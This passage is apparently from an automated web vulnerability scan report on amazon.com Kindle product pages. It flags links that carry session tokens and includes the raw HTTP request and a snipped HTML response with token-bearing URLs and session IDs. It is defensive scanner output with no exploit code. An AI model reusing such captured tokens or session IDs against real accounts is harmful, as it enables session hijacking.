</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_ylApnb0SRCP6X?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB002Y27P3M%252Fx22%252Fref%253Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pea...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_ylApnb0SRCP6X?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB002Y27P3M%252Fx22%252Fref%253Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pea...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<span class="shasta_att_coverage_map_link"><a href="/gp/redirect.html/ref=amb_link_354073722_1/191-9849773-1831958?_encoding=UTF8&location=http%3A%2F%2Fclient0.cellmaps.com%2Fviewer.html%3Fcov%3D1&token=F65275FC32A090EFBE50BC510943370FAF8CBE85&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-22&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1277899102&pf_rd_i=B002Y27P3M">Check 3G coverage area</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_2/191-9849773-1831958?location=http://www.nytimes.com/2010/08/26/technology/personaltech/26pogue.html&token=FC3BB6E90A3E8721ADB0B39F84805E48900EDACD&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_4/191-9849773-1831958?location=http://www.fastcompany.com/1684575/wanted-amazon-kindle-3rd-generation&token=3E149F19B6E9E7F0A5EBFF5447967C76704426D7&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_6/191-9849773-1831958?location=http://reviews.cnet.com/e-book-readers/amazon-kindle-3g-wi/4505-3508_7-34140425.html&token=31E3D690023DB719242D9ACF186BCE6C53185AEC&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_8/191-9849773-1831958?location=http://www.engadget.com/2010/08/27/amazon-kindle-review/&token=FF754E482756BF305A345655C9D0461CE99EA38C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_10/191-9849773-1831958?location=http://www.pcworld.com/article/202146/amazon_kindle_3_the_best_kindle_yet.html&token=D9CB6E2A29AB1E9D9FDC167523A8318384D83181&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_12/191-9849773-1831958?location=http://www.pcmag.com/article2/0,2817,2368075,00.asp&token=6B5D74846F287633B361444F8611D03583758E3C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_14/191-9849773-1831958?location=http://www.zdnet.com/blog/btl/review-my-20-minutes-with-amazons-latest-kindle/37252&token=5530EC54CBF650B76674ECF0F50AADBEFC9C0B6B&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_16/191-9849773-1831958?location=http://www.crunchgear.com/2010/07/28/amazon-reveals-new-kindle-139-for-wi-fi-version/&token=888A7FA0C2516C44AA33B5A80C267236CE93D96B&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</b><a href="/gp/redirect.html/ref=amb_link_353825462_17/191-9849773-1831958?location=http://ireaderreview.com/2010/07/28/kindle-3-review/&token=48DB81F4832216373A8CF9DDF08F2A06EE62AE6A&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M" target="_blank">Read full article</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DF95BDF4B945C023B44855B9FEFEE9494DB99FE4&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F4D3377DB2B4B5BDAFCA46384B42B1383F728255&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=45398D950F1929A712848FA11DAE56FAEDE1C83E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=670B2440B1EC894C9D07A9066327BA7768EAAF48&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=330222DF2979944A771EE86DB7040F720CF0E604&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7C301DD2579DCC72E2BFEE04ADBAEF6D4EF82AAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=67C96CBDB127CADA2FE6B4C6C90A77D807347B28&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=34040DAFFA8D9FF7D38AE1CFEC267643F302753F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=239124B8CDE626321FEF87F4FA5D23AAB3DEF3CF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958"
>Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.68. http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_xlApnb13PTZNC?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_fa_dp_xlApnb13PTZNC%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by%2520Amazon
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_xlApnb13PTZNC?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0015T963C%252Fx22%252Fref%253Dcm_sw_r_tw_dp_xlApnb13PTZNC%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_tw_dp_xlApnb13PTZNC%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/187-6920967-0553225?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=8AF62AB7ACDE502E7743675297CFF93F69261AA8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2A7F22C631B7AE7AAF20BE088CD2B5B7F134EAF8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
http://www.amazon.com/gp/voting/cast/Reviews/2115/R9J54TZ1541OR/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=5683F405FDA36D090ADA5C068BA632D753C9B956&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R9J54TZ1541OR.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225
http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=289D038174E6CCD7D1CAB37A1971DD13AA4DF479&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=B855AC71E5AAEFD49D2AA2649EC24D94F71DFA4B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=A750D83A7128E87EC09BE45B4A6F0FFBF827F98F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225
http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2FACFA3FF652901070EB07168901A6C2E350FCA0&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AD8DC967E92B545AA8AF75FD1A346CD19C31E1AF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225
http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=0EACC5A3790CED813CC9E6FB1B5FC1270926CA78&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225

Request

GET /Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:34 GMT
Server: Server
x-amz-id-1: 1X3EPAT3ZMNVCSGSMBAN
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XWFESHf4LDfW4Q4jtyPNlMZUcPixPfxkYZBCrWieQtkwWSKt/X54SoeJ/bATZoKW
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=187-6920967-0553225; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 508145

<html>
<head>

<style type="text/css"><!--

BODY { font
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_xlApnb13PTZNC?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_fa_dp_xlApnb13PTZNC%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by%2520Amazon" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_xlApnb13PTZNC?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_fa_dp_xlApnb13PTZNC%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by%2520Amazon', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_xlApnb13PTZNC?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0015T963C%252Fx22%252Fref%253Dcm_sw_r_tw_dp_xlApnb13PTZNC%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_tw_dp_xlApnb13PTZNC%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_xlApnb13PTZNC?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0015T963C%252Fx22%252Fref%253Dcm_sw_r_tw_dp_xlApnb13PTZNC%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Free%25203G%252C%25206%2522%2520Display%252C%2520White%2520-%25202nd%2520Generation%2520by...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0015T963C%2Fref%3Dcm_sw_r_tw_dp_xlApnb13PTZNC%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=B855AC71E5AAEFD49D2AA2649EC24D94F71DFA4B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=289D038174E6CCD7D1CAB37A1971DD13AA4DF479&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RAL8ABGFOK5J4/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=A750D83A7128E87EC09BE45B4A6F0FFBF827F98F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RAL8ABGFOK5J4.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=AD8DC967E92B545AA8AF75FD1A346CD19C31E1AF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2FACFA3FF652901070EB07168901A6C2E350FCA0&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Helpful.Reviews&voteSessionID=187-6920967-0553225"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RSMM3B0N8CW6M/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=0EACC5A3790CED813CC9E6FB1B5FC1270926CA78&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMTVUOTYzQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RSMM3B0N8CW6M.2115.Inappropriate.Reviews&voteSessionID=187-6920967-0553225"
>Report abuse</a>
...[SNIP]...
